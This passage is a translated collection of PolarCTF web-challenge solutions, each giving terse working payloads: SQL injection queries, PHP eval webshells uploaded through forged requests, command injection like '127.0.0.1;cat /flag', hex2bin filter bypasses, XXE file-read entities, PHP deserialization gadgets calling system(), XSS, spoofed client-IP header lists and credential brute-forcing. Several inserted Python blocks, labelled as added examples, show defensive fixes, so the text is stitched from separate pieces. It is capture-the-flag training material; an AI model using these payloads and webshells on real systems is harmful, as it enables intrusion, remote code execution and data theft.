$payload = base64_encode($serialized);
echo $payload;
?>
polar=Tzo1OiJQb2xhciI6Mjp7czo1OiJuaWdodCI7Tzo1OiJOaWdodCI6MDp7fXM6OToibmlnaHRfYXJnIjtPOjM6IkRheSI6MTp7czo4OiJmaWxlbmFtZSI7czo5OiIvZmxmbGFnYWciO319
PolarOA
500 points, 5 Polar coins
Java Shiro deserialization vulnerability
Payload construction is hard.
search
300 points, 3 Polar coins
[2024 Spring Individual Challenge]
query=1'/**/or/**/1=1#
query=1'/**/uNion/**/Select/**/1,2,3,4,5#
query=1'/**/uNion/**/Select/**/1,group_concat(Flag),3,4,5/**/From/**/Flag#
Fastjson
500 points, 5 Polar coins
Parked for now.
file
300 points, 3 Polar coins
[2024 Spring Individual Challenge]
dirsearch -u url
upload.php
uploaded
Send the webshell with Burp Suite, changing the file name from png to php.
Connect with Godzilla (哥斯拉); there are two fake flags, the real one is in /flag.
uploader
100 points, 1 Polar coin
[2024 Spring Individual Challenge]
No upload UI
Build one:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Post DATA POC</title>
</head>
<body>
<form action="http://92214446-57a1-4224-93e2-ea1c7a5a57ce.www.polarctf.com:8090/" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"> <br><br>
<input type="submit" value="提交">
</form>
</body>
</html>
POST / HTTP/1.1
Host: 92214446-57a1-4224-93e2-ea1c7a5a57ce.www.polarctf.com:8090
Content-Length: 231
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryroQOOub0x149mpDK
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
------WebKitFormBoundaryroQOOub0x149mpDK
Content-Disposition: form-data; name="file"; filename="phppass.php"
Content-Type: application/octet-stream
<?php
eval($_POST["pass"]);
?>
------WebKitFormBoundaryroQOOub0x149mpDK--
Run the uploaded webshell:
/331d4abb3f3a802c4989ed7737c537ba/phppass.php
pass=system("cat /flag");
PlayGame
300 points, 3 Polar coins
[2024 Spring Individual Challenge]
https://www.bejson.com/runcode/php/
<?php
class User{
    public $name;
    public $age;
    public $sex;
}
class PlayGame{
    public $user;
    public $gameFile = "/flag";
}
$playgame = new PlayGame();
$user = new User();
$user->name = $playgame;
$playgame->user = $user;
$playgame->gameFile = "/flag";
// generate the serialized payload
$a = new PlayGame();
$a->user = new User();
$a->user->name = new PlayGame();
$a->user->name->gameFile = '/flag';
$payload = serialize($a);
// URL-encode and print the payload
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
// raw payload (contains non-printable characters; take care when copying)
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A8%3A%22PlayGame%22%3A2%3A%7Bs%3A4%3A%22user%22%3BO%3A4%3A%22User%22%3A3%3A%7Bs%3A4%3A%22name%22%3BO%3A8%3A%22PlayGame%22%3A2%3A%7Bs%3A4%3A%22user%22%3BN%3Bs%3A8%3A%22gameFile%22%3Bs%3A5%3A%22%2Fflag%22%3B%7Ds%3A3%3A%22age%22%3BN%3Bs%3A3%3A%22sex%22%3BN%3B%7Ds%3A8%3A%22gameFile%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D
原始Payload:
O:8:"PlayGame":2:{s:4:"user";O:4:"User":3:{s:4:"name";O:8:"PlayGame":2:{s:4:"user";N;s:8:"gameFile";s:5:"/flag";}s:3:"age";N;s:3:"sex";N;}s:8:"gameFile";s:5:"/flag";}
/?polar[flag.flag=O:8:"PlayGame":2:{s:4:"user";O:4:"User":3:{s:4:"name";O:8:"PlayGame":2:{s:4:"user";N;s:8:"gameFile";s:5:"/flag";}s:3:"age";N;s:3:"sex";N;}s:8:"gameFile";s:5:"/flag";}
覆盖 (Override)
100 points, 1 Polar coin
[2024 Spring Individual Challenge]
Note: almost the same as 干正则?
?id=a[]%3Dwww.polarctf.com&cmd=;ls
?id=a[]%3Dwww.polarctf.com&cmd=;ls;cat fla*|base64;
PHP反序列化初试 (First try at PHP deserialization)
100 points, 1 Polar coin
[2024 Spring Individual Challenge]
Generate the payload:
https://www.bejson.com/runcode/php/
<?php
class Easy{
    public $name;
    public function __wakeup()
    {
        echo $this->name;
    }
}
class Evil{
    public $evil;
    private $env;
}
$evil = new Evil();
$easy = new Easy();
$evil->evil = "ls;cat f1@g.php";
$easy->name = $evil;
// generate the serialized payload
$payload = serialize($easy);
// URL-encode and print the payload
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
// raw payload (contains non-printable characters; take care when copying)
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A4%3A%22Easy%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Evil%22%3A2%3A%7Bs%3A4%3A%22evil%22%3Bs%3A15%3A%22ls%3Bcat+f1%40g.php%22%3Bs%3A9%3A%22%00Evil%00env%22%3BN%3B%7D%7D
原始Payload:
O:4:"Easy":1:{s:4:"name";O:4:"Evil":2:{s:4:"evil";s:15:"ls;cat f1@g.php";s:9:"Evilenv";N;}}
Use the URL-encoded payload; the raw one may be incomplete.
ls
f1@g.php index.php
机器人 (Robot)
100 points, 1 Polar coin
[2024 Spring Individual Challenge]
First half of the flag:
/robots.txt
dirsearch -u url/27f5e15b6af3223f1176293cd015771d
Second half of the flag:
/27f5e15b6af3223f1176293cd015771d/flag.php
csdn
300 points, 3 Polar coins
[2024 Spring Individual Challenge]
?xxs=file://flag/flag.txt
PolarOA2.0
500 points, 5 Polar coins
[2024 Summer Individual Challenge]
Parked for now.
CC链 (CC chain)
500 points, 5 Polar coins
[2024 Summer Individual Challenge]
Parked for now.
FastJsonBCEL
500 points, 5 Polar coins
[2024 Summer Individual Challenge]
Parked for now.
ezJson
500 points, 5 Polar coins
[2024 Summer Individual Challenge]
fastjson deserialization
Parked for now.
Dragon
300 points, 3 Polar coins
The flag is in the cookies.
tnl
300 points, 3 Polar coins
[2024 Summer Individual Challenge]
twothree=php://filter/convert.base64-encode/resource=index
twothree=php://filter/convert.base64-encode/index/resource=flag
你知道sys还能这样玩吗 (Did you know sys can be played like this?)
300 points, 3 Polar coins
[2024 Summer Individual Challenge]
/sys.php
How to bypass the filter:
$cmd = $_POST['cmd'];
if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget/i', $cmd)) {
$output = system($cmd);
echo $output;
}
Quotes and parentheses are not filtered:
└─# echo "ls"|hex
6c730a
cmd=php -r 'system(hex2bin("6c73"));'
└─# echo "cat /flag.txt"|hex
636174202f666c61672e7478740a
cmd=php -r 'system(hex2bin("636174202f666c61672e7478740a"));'
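The sys.php denylist above is both too permissive (it never mentions `php`, `hex2bin`, quotes or parentheses) and too restrictive (the `\.` entry blocks any dotted address, so a legitimate `ping 127.0.0.1` fails). The same weakness underlies the `;` and `$IFS$9` payloads in 再来ping一波啊 and EZ_Host. The Python below is an added example (not from this write-up) that reproduces the page's regex so its behaviour can be checked, and beside it the allow-list design a ping-style feature should use: parse the input as an IP address and pass it as one argv element with no shell. Function names and the sample inputs are this example's own.

```python
import ipaddress
import re
import subprocess

# The denylist from sys.php above, reproduced verbatim and applied case-insensitively.
DENYLIST = re.compile(
    r"ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|\*|sort|ch|zip|mod|sl|find|"
    r"sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|"
    r"xxd|base64|date|bash|env|\?|wget",
    re.IGNORECASE,
)


def denylist_allows(cmd: str) -> bool:
    """What sys.php does: pass anything the pattern does not match to system()."""
    return DENYLIST.search(cmd) is None


def build_ping_argv(target: str) -> list:
    """Allow-list instead: the only thing accepted is a syntactically valid IP
    address, and it becomes a single argv element.  No shell is involved, so
    ';', '|', '$IFS$9' and quoting are plain characters, not operators."""
    addr = ipaddress.ip_address(target.strip())  # ValueError for anything that is not an address
    return ["ping", "-c", "1", str(addr)]


def ping_target_ok(target: str) -> bool:
    try:
        build_ping_argv(target)
        return True
    except ValueError:
        return False


def run_ping(target: str) -> str:
    """Execute via argv, never via a shell string."""
    argv = build_ping_argv(target)
    return subprocess.run(argv, capture_output=True, text=True, timeout=10).stdout
```

The hex2bin payload from the page passes the denylist untouched while `ping -c 1 127.0.0.1` is rejected by it; the allow-list accepts the address and refuses every string that carries anything else.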
扫扫看 (Scan and see)
100 points, 1 Polar coin
[2024 Summer Individual Challenge]
dirsearch -u url
/flag.php
Check the output.
debudao
100 points, 1 Polar coin
[2024 Summer Individual Challenge]
<script>alert("aa")</script>
<script>alert(document.cookie)</script>
审计 (Audit)
100 points, 1 Polar coin
[2024 Summer Individual Challenge]
https://blog.csdn.net/2301_81684021/article/details/144907940
// numbers
240610708 0e462097431906509019562988736854
314282422 0e990995504821699494520356953734
571579406 0e972379832854295224118025748221
903251147 0e174510503823932942361353209384
1110242161 0e435874558488625891324861198103
1320830526 0e912095958985483346995414060832
1586264293 0e622743671155995737639662718498
2302756269 0e250566888497473798724426794462
2427435592 0e067696952328669732475498472343
2653531602 0e877487522341544758028810610885
3293867441 0e471001201303602543921144570260
3295421201 0e703870333002232681239618856220
3465814713 0e258631645650999664521705537122
3524854780 0e507419062489887827087815735195
3908336290 0e807624498959190415881248245271
4011627063 0e485805687034439905938362701775
4775635065 0e998212089946640967599450361168
4790555361 0e643442214660994430134492464512
5432453531 0e512318699085881630861890526097
5579679820 0e877622011730221803461740184915
5585393579 0e664357355382305805992765337023
6376552501 0e165886706997482187870215578015
7124129977 0e500007361044747804682122060876
7197546197 0e915188576072469101457315675502
7656486157 0e451569119711843337267091732412
To find ones with other prefixes:
<?php
function findMD5Collision($prefix) {
    // try different strings in a loop
    for ($i = 0; ; $i++) {
        // build a candidate string
        $candidate = $prefix . $i;
        // compute its MD5 hash
        $md5 = md5($candidate);
        // check whether the hash has the required form
        if (preg_match("/^0e[0-9]{30}/", $md5)) {
            echo $candidate;
            return $candidate; // return the matching string
        }
    }
    return false; // not found: return false
}
$prefix = "ailx10"; // we want the string to start with "ailx10"
$string = findMD5Collision($prefix);
if ($string !== false) {
    echo "找到的字符串: " . $string . "\n";
    echo "MD5 哈希值: " . md5($string) . "\n";
} else {
    echo "未找到符合条件的字符串。\n";
}
?>
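The table and search above exist because PHP's `==` converts two numeric-looking strings to numbers before comparing them, so every `0e<digits>` digest equals 0 and equals every other such digest (PHP 8 kept this rule for string-to-string comparisons). The Python below is an added example (not from this write-up) that emulates that comparison so the effect can be checked against the table entries, and shows the fix: strict comparison (`===`), done in constant time. Function names are this example's own; the stored hashes in the checks come from the table above.

```python
import hashlib
import hmac
import re

# PHP's == turns two numeric-looking strings into numbers before comparing
# (PHP 8 kept this for string-vs-string), so every "0e<digits>" hash equals 0.
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")


def php_loose_equal(a: str, b: str) -> bool:
    """Emulate `$a == $b` for two PHP strings."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A hex digest PHP would read as the number 0: '0e' followed only by digits."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def vulnerable_check(password: str, stored_md5: str) -> bool:
    """`md5($password) == $stored`: any magic-hash password passes a magic stored hash."""
    return php_loose_equal(hashlib.md5(password.encode()).hexdigest(), stored_md5)


def fixed_check(password: str, stored_md5: str) -> bool:
    """`===` semantics plus a constant-time comparison.  MD5 is kept only so the
    comparison fix is visible; a real login should use a password hash."""
    return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored_md5)
```

`240610708` from the table authenticates against the stored hash of a different table entry under the loose check and fails under the strict one; `is_magic_hash` is the predicate the page's PHP search implements with `preg_match`.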
ExX?
300 points, 3 Polar coins
[2024 Summer Individual Challenge]
2.8.0 dom
dirsearch -u url
dom.php
/dom.php
POST:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe[
<!ELEMENT name ANY>
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flagggg.php"
>]>
<name>&xxe;</name>
---or----
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///var/www/html/flagggg.php" >]>
<user>
<name>&xxe;</name>
</user>
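The xxe and ExX? payloads above all hinge on one thing: the parser honours a DOCTYPE, and a DOCTYPE is the only place an entity (`SYSTEM "file:///..."`, `php://filter`, or the external `%xxe;` parameter entity) can be declared. The Python below is an added example (not from this write-up) of the server-side gate: detect a DTD with the parser's own tokenizer rather than a substring check, refuse the document if one is present, and only then parse. Function names are this example's own; the sample documents are constructed from the payloads on this page.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class UnsafeXml(ValueError):
    pass


def has_doctype(data: bytes) -> bool:
    """Detect a DTD with expat's own tokenizer, so a DOCTYPE cannot be hidden from a
    naive substring check by case or whitespace tricks.  Entities (internal,
    SYSTEM file:///..., php://filter, or the external %xxe; parameter entity)
    can only be declared inside a DOCTYPE, so its presence is the signal."""
    parser = expat.ParserCreate()
    seen = []
    parser.StartDoctypeDeclHandler = lambda name, sysid, pubid, internal: seen.append(name)
    try:
        parser.Parse(data, True)
    except expat.ExpatError:
        pass  # malformed input is rejected by the real parse below anyway
    return bool(seen)


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse client-supplied XML, refusing any document that carries a DTD."""
    if has_doctype(data):
        raise UnsafeXml("documents with a DOCTYPE are not accepted")
    return ET.fromstring(data)


def xml_is_accepted(data: bytes) -> bool:
    try:
        parse_untrusted_xml(data)
        return True
    except (UnsafeXml, ET.ParseError):
        return False
```

For a PHP backend the equivalent is to keep external entity loading off (the default since PHP 8) and to reject `LIBXML_NOENT`/`LIBXML_DTDLOAD` options on untrusted input; the DOCTYPE gate above is the parser-independent version of that rule.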
upload1
100 points, 1 Polar coin
[2024 Summer Individual Challenge]
The extension is validated on the front end; submit the php webshell directly via POST.
pass=system("cat /flag.txt");
rapyiquan
100 points, 1 Polar coin
[2024 Autumn Individual Challenge]
?c[md=l\s /
?c[md=c\at /fl\ag.php
bllbl_ser1
100 points, 1 Polar coin
[2024 Autumn Individual Challenge]
<?php
class bllbl{
    public $qiang; // my strength
}
class bllnbnl{
    public $er = 'system("ls /");';
}
$a = new bllbl();
$b = new bllnbnl();
$a->qiang = $b;
//$b->er='system("ls /");'; // same as assigning it in the class
// note the semicolon after ); otherwise it errors
$payload = serialize($a);
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A5%3A%22bllbl%22%3A1%3A%7Bs%3A5%3A%22qiang%22%3BO%3A7%3A%22bllnbnl%22%3A1%3A%7Bs%3A2%3A%22er%22%3Bs%3A15%3A%22system%28%22ls+%2F%22%29%3B%22%3B%7D%7D
原始Payload:
O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:15:"system("ls /");";}}
?blljl=O:5:"bllbl":1:{s:5:"qiang";O:7:"bllnbnl":1:{s:2:"er";s:20:"system("cat /flag");";}}
EZ_Host
300 points, 3 Polar coins
[2024 Autumn Individual Challenge]
dirsearch -u url
/flag
or
?host=127.0.0.1;ls
?host=127.0.0.1;cat flag
传马 (Upload the webshell)
300 points, 3 Polar coins
[2024 Autumn Individual Challenge]
Front-end validation blocks php; change the webshell's extension after the front-end check, when the request goes to the back end.
pass=system("cat /flag.txt");
笑傲上传 (Laughing at upload)
300 points, 3 Polar coins
[2024 Autumn Individual Challenge]
Upload a normal jpg (not a webshell); the output then shows include.php.
/include.php?file=php://filter/convert.base64-encode/resource=/flag.txt
Deserialize
500 points, 5 Polar coins
[2024 Autumn Individual Challenge]
/hidden/
/hidden/hidden.php
<?php
class Token {
    public $id;
    public $secret;
    public function __construct($id, $secret) {
        $this->id = $id;
        $this->secret = $secret;
    }
    public function generateToken() {
        return "Token for {$this->id}";
    }
}
class User {
    public $name;
    public $isAdmin = false;
    public $token;
    public function __construct($name, $isAdmin, Token $token) {
        $this->name = $name;
        $this->isAdmin = $isAdmin;
        $this->token = $token;
    }
    public function getInfo() {
        return "{$this->name} is " . ($this->isAdmin ? "an admin" : "not an admin");
    }
}
class Product {
    public $productName;
    public $price;
    public function __construct($productName, $price) {
        $this->productName = $productName;
        $this->price = $price;
    }
    public function displayProduct() {
        return "Product: {$this->productName}, Price: {$this->price}";
    }
}
$product = new Product("apple", 1000);
$token = new Token(1, "secret");
$token->product = $product;
$user = new User("ZHSH", true, $token);
$payload = serialize($user);
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;
?>
URL编码后的Payload:
O%3A4%3A%22User%22%3A3%3A%7Bs%3A4%3A%22name%22%3Bs%3A4%3A%22ZHSH%22%3Bs%3A7%3A%22isAdmin%22%3Bb%3A1%3Bs%3A5%3A%22token%22%3BO%3A5%3A%22Token%22%3A3%3A%7Bs%3A2%3A%22id%22%3Bi%3A1%3Bs%3A6%3A%22secret%22%3Bs%3A6%3A%22secret%22%3Bs%3A7%3A%22product%22%3BO%3A7%3A%22Product%22%3A2%3A%7Bs%3A11%3A%22productName%22%3Bs%3A5%3A%22apple%22%3Bs%3A5%3A%22price%22%3Bi%3A1000%3B%7D%7D%7D
原始Payload:
O:4:"User":3:{s:4:"name";s:4:"ZHSH";s:7:"isAdmin";b:1;s:5:"token";O:5:"Token":3:{s:2:"id";i:1;s:6:"secret";s:6:"secret";s:7:"product";O:7:"Product":2:{s:11:"productName";s:5:"apple";s:5:"price";i:1000;}}}
序列一下 (Serialize it)
300 points, 3 Polar coins
[2024 Autumn Individual Challenge]
https://www.jyshare.com/compile/1/
<?php
class Polar{
    public $lt = "system";
    public $b = "ls /";
}
$a = new Polar();
$payload = serialize($a);
echo "URL编码后的Payload:\n";
echo urlencode($payload) . "\n\n";
echo "原始Payload:\n";
echo $payload;
?>
output:
URL编码后的Payload:
O%3A5%3A%22Polar%22%3A2%3A%7Bs%3A2%3A%22lt%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22b%22%3Bs%3A4%3A%22ls+%2F%22%3B%7D
原始Payload:
O:5:"Polar":2:{s:2:"lt";s:6:"system";s:1:"b";s:4:"ls /";}
1ncIud3
100 points, 1 Polar coin
[2024 Autumn Individual Challenge]
f14g fla9 f1ag fl4g fl49 f149
/?page=..././..././f1a9
一写一个不吱声 (Write without a sound)
500 points, 5 Polar coins
[2024 Autumn Individual Challenge] classes; you may need to know $JAVA_HOME? Java deserialization vulnerability + Spring Boot arbitrary file write to RCE under special conditions
Parked for now (fangyifang).
SnakeYaml
500 points, 5 Polar coins
[2024 Autumn Individual Challenge] Use c3p0 secondary deserialization to get the output echoed back
Parked for now (fangyifang).
投喂 (Feeding)
100 points, 1 Polar coin
[2024 Autumn Individual Challenge]
<?php
class User{
    public $username = "admin";
    public $is_admin = true;
}
$a = new User();
$payload = serialize($a);
echo $payload;
?>
output:
O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"is_admin";b:1;}
data=data=O:4:"User":2:{s:8:"username";s:5:"admin";s:8:"is_admin";b:1;}
ezUtil
500 points, 5 Polar coins
[2024 Winter Individual Challenge]
Parked for now (fangyifang).
狗黑子的RCE (Gouheizi's RCE)
100 points, 1 Polar coin
[2024 Winter Individual Challenge]
gouheizi2=gougouheiziheizi
?gouheizi1=l\s /
?gouheizi1=c\at /fl\ag.php
坏掉的上传页 (Broken upload page)
300 points, 3 Polar coins
[2024 Winter Individual Challenge]
Modify the page:
<label for="file">文件名:</label>
<input type="file" name="file"id="file"><br>
<input type="submit" name="submit" value="提交">
Webshell:
muma.php
GIF89a
<?php @eval($_POST['pass']);?>
Can't get it uploaded... parked.
/config.php
/database.db
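The upload challenges on this page (upload, ezupload, 你的马呢?, 传马, and this one) get through with a doubled extension (`mm.phphpp`), a renamed `mm.gif`, or a `GIF89a` header glued to PHP. Each works because the server makes a decision on one substring of the name or a few leading bytes. The Python below is an added example (not from this write-up) of an upload validator that decides on the whole name and the whole body: no directory parts, exactly one extension from an allow-list, magic bytes that match it, and no script or PHP open tag anywhere in the data. The storage name is chosen by the server. Function names, the format table and the sample files are this example's own.

```python
import os
import re

# Magic bytes for the only formats this uploader should accept (constructed table).
MAGIC = {"png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8", "jpg": b"\xff\xd8\xff"}
_EMBEDDED_CODE = re.compile(rb"<\?|<script", re.IGNORECASE)


class RejectedUpload(ValueError):
    pass


def validate_upload(filename: str, content: bytes) -> str:
    """Return a server-chosen storage name, or raise RejectedUpload.

    The decisions are: no directory parts; exactly one extension (so
    'a.php.png', '.htaccess' and the double-written 'mm.phphpp' never reach a
    rename step); the extension on an allow-list; magic bytes that match it;
    and no PHP/script tags in the body, which catches 'GIF89a<?php ...' polyglots.
    """
    if not filename or os.path.basename(filename) != filename:
        raise RejectedUpload("path components are not allowed")
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise RejectedUpload("exactly one extension is required")
    ext = parts[1]
    if ext not in MAGIC:
        raise RejectedUpload("extension %r is not allowed" % ext)
    if not content.startswith(MAGIC[ext]):
        raise RejectedUpload("content does not look like a %s file" % ext)
    if _EMBEDDED_CODE.search(content):
        raise RejectedUpload("embedded code inside image data")
    return "%s.%s" % (os.urandom(8).hex(), ext)   # never reuse the client's name


def upload_ok(filename: str, content: bytes) -> bool:
    try:
        validate_upload(filename, content)
        return True
    except RejectedUpload:
        return False
```

The body scan is deliberately strict and will also reject images carrying XMP metadata (`<?xpacket`); where that matters, re-encoding the image through an image library is the stronger alternative. Whatever passes should still be stored where the web server will not execute it.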
xxmmll
300 points, 3 Polar coins
[2024 Winter Individual Challenge]
dirsearch -u url
3:25] 200 - 469B - /Dockerfile
Might not work: it has already been submitted and I don't know whether the flag is wrong; if it is, use the xxm method to look for a new flag.
Note
300 points, 3 Polar coins
[2024 Winter Individual Challenge]
/debug.log
<?php
class Note{
    private $filename;
    private $content;
}
$note = new Note();
$reflection = new ReflectionClass($note);
$filenameProperty = $reflection->getProperty("filename");
$filenameProperty->setAccessible(true);
$filenameProperty->setValue($note, 'flag.txt');
echo urlencode(serialize($note));
?>
/?data=O%3A4%3A%22Note%22%3A2%3A%7Bs%3A14%3A%22%00Note%00filename%22%3Bs%3A8%3A%22flag.txt%22%3Bs%3A13%3A%22%00Note%00content%22%3BN%3B%7D
赌王 (Gambling King)
300 points, 3 Polar coins
[2024 Winter Individual Challenge]
Burp Suite brute force:
spin=%E6%97%8B%E8%BD%AC
103
你可以去ed3d2c21991e3bef5e069713af9fa6ca这个目录下看看
/ed3d2c21991e3bef5e069713af9fa6ca.php
<script>alert("a")</script>
<script>confirm("a")</script>
e744f91c29ec99f0e662c9177946c627
/e744f91c29ec99f0e662c9177946c627.php
127.0.0.1;ls
It only executes when the client IP is four 1s (1.1.1.1).
Install the Java version of the fakeIp extension in Burp Suite.
Intercept and add to the request:
X-Forwarded-For: 1.1.1.1
X-Forwarded: 1.1.1.1
Forwarded-For: 1.1.1.1
Forwarded: 1.1.1.1
X-Requested-With: 1.1.1.1
X-Forwarded-Proto: 1.1.1.1
X-Forwarded-Host: 1.1.1.1
X-remote-IP: 1.1.1.1
X-remote-addr: 1.1.1.1
True-Client-IP: 1.1.1.1
X-Client-IP: 1.1.1.1
Client-IP: 1.1.1.1
X-Real-IP: 1.1.1.1
Ali-CDN-Real-IP: 1.1.1.1
Cdn-Src-Ip: 1.1.1.1
Cdn-Real-Ip: 1.1.1.1
CF-Connecting-IP: 1.1.1.1
X-Cluster-Client-IP: 1.1.1.1
WL-Proxy-Client-IP: 1.1.1.1
Proxy-Client-IP: 1.1.1.1
Fastly-Client-Ip: 1.1.1.1
True-Client-Ip: 1.1.1.1
X-Originating-IP: 1.1.1.1
X-Host: 1.1.1.1
X-Custom-IP-Authorization: 1.1.1.1
Send
127.0.0.1;ls /
127.0.0.1;cat /flag
ezezser
500 points, 5 Polar coins
[2024 Winter Individual Challenge]
See below: the payload can only be written after recovering the complete index.php source:
<?php
class polar520{
    private $polarday = 'nukakak';
    private $polarnight = 'nukaka';
    private $polar = false;
    private $class;
    public function __construct(){
        $this->class = new backDoor();
    }
}
class backDoor {
    private $key = "system('cat /flag');";
}
$a = new polar520();
$payload = serialize($a);
echo "payload:\n";
echo $payload;
echo "\nurlencode payload:\n";
echo urlencode($payload);
?>
output:
payload:
O:8:"polar520":4:{s:18:"polar520polarday";s:7:"nukakak";s:20:"polar520polarnight";s:6:"nukaka";s:15:"polar520polar";b:0;s:15:"polar520class";O:8:"backDoor":1:{s:13:"backDoorkey";s:20:"system('cat /flag');";}}
urlencode payload:
O%3A8%3A%22polar520%22%3A4%3A%7Bs%3A18%3A%22%00polar520%00polarday%22%3Bs%3A7%3A%22nukakak%22%3Bs%3A20%3A%22%00polar520%00polarnight%22%3Bs%3A6%3A%22nukaka%22%3Bs%3A15%3A%22%00polar520%00polar%22%3Bb%3A0%3Bs%3A15%3A%22%00polar520%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A13%3A%22%00backDoor%00key%22%3Bs%3A20%3A%22system%28%27cat+%2Fflag%27%29%3B%22%3B%7D%7D
/?polarday=1&polarnight=2
Cookie=polar520=payload
dirsearch -u url
Found .git
pipx run githacker --url http://e80e25c0-d461-468b-823f-b028bb8bb430.www.polarctf.com:8090/.git/ --output-folder ezezser
output:
2025-09-29 05:37:29 INFO Check it out: ezezser/92e5ceac55445b52c2d074282b9926b5
2025-09-29 05:37:29 INFO 1 / 1 were exploited successfully
┌──(root㉿kali)-[~/ezezser/92e5ceac55445b52c2d074282b9926b5]
└─# ls -tlr
total 12
-rw-r--r-- 1 root root 357 Sep 29 05:37 index.php
-rw-r--r-- 1 root root 12 Sep 29 05:37 env.php
-rw-r--r-- 1 root root 69 Sep 29 05:37 config.php
# the index.php code is incomplete
# look at the commit history
git log --all
# use the last historical commit
└─# git reset --hard 0c635537b773cdd87268e7dbdc51f985eca0b0b4
HEAD is now at 0c63553 bec54015e611cc32beb1d7674fa7873f
button
100 points, 1 Polar coin
[2024 Winter Individual Challenge]
JS code audit
/proxy.php?file=flag
Tic-tac-toe (井字棋)
100 points, 1 Polar coin
[2024 Winter Individual Challenge]
Set a breakpoint in the JS.
Deliberately lose, then change the winner to the other side so that you win, and the flag pops up.
declareWinner(gameWon.player === huPlayer ? "您赢了!" : "您输了.");
It was O originally; change it to huPlayer="X".
Simple Navigation Site (简单的导航站)
100 points, 1 Polar coin
[2024 Winter Individual Challenge]
PHP's md5() cannot hash an array, so it returns the same value for any array and two array arguments compare as equal.
/audit.php?user1[]=1&user2[]=2
View the homepage source:
<div class="no-select">Admin1234!</div>
Use it as the password and brute-force the admin username.
P0la2adm1n
Upload a webshell:
/uploads/
Browse the files with Godzilla; under the flag??? directory there is flag.txt, but it contains many flags. Log in to the flag verification page and brute-force them.
Task cmd (任务cmd)
500 points, 5 Polar coins
[2024 Winter Individual Challenge]
dirsearch -u url
find dir /new/
url/new/
The output contains X-Power-by: username is xiaoming
Brute-force xiaoming's password: 123123
Modify the URL: horizontal privilege escalation to xiaohei
Got the boss key: bossisxiaoheizi
dirsearch -u url
Found /login.php
Brute-force the boss password: flower
Guessed that the challenge uses a cmd parameter.
/new/file/upload.php?cmd=cat%20/fla*
Heart to Heart (坦诚相见)
500 points, 5 Polar coins
[2024 Winter Individual Challenge]
┌──(root㉿kali)-[/tmp/aa]
└─# echo "<?php echo 'pass'; @eval(\$_POST['pass']); ?>"|base64
PD9waHAgZWNobyAncGFzcyc7IEBldmFsKCRfUE9TVFsncGFzcyddKTsgPz4K
rce=echo PD9waHAgZWNobyAncGFzcyc7IEBldmFsKCRfUE9TVFsncGFzcyddKTsgPz4K|base64 -d|tee 1.php
(apache:/) $ sudo cat /flag
flag{07cc6fe29d83a81846969c48cedfe607}
Besides generating the webshell with base64 + tee as above, the filter can also be bypassed by deleting no.php.
Give Me a Popup (来个弹窗)
100 points, 1 Polar coin
[2025 Spring Individual Challenge]
"><scrscriptipt>alert(1)</scscriptript>
└─# echo "白金之星"|md5sum
5c36b203dca9ceca394697e7ff079cb6 -
On Linux the trailing newline has to be removed by adding the -n parameter!!!! With or without quotes makes no difference.
┌──(root㉿kali)-[/tmp/aa]
└─# echo -n 白金之星|md5sum
dbd65172f0a14c279bc461cd0185c70a -
The md5sum in Kali above didn't work,
<?php
$user1="白金之星";
echo $user1."-->".md5($user1) . "\n\n";
?>
白金之星-->
flag{dbd65172f0a14c279bc461cd0185c70a}
Coconut Tree Dizzies Freshwater Fish (椰子树晕淡水鱼)
500 points, 5 Polar coins
[2025 Spring Individual Challenge]
dirsearch -u url
/admin.sh
/about.php
/uploads/
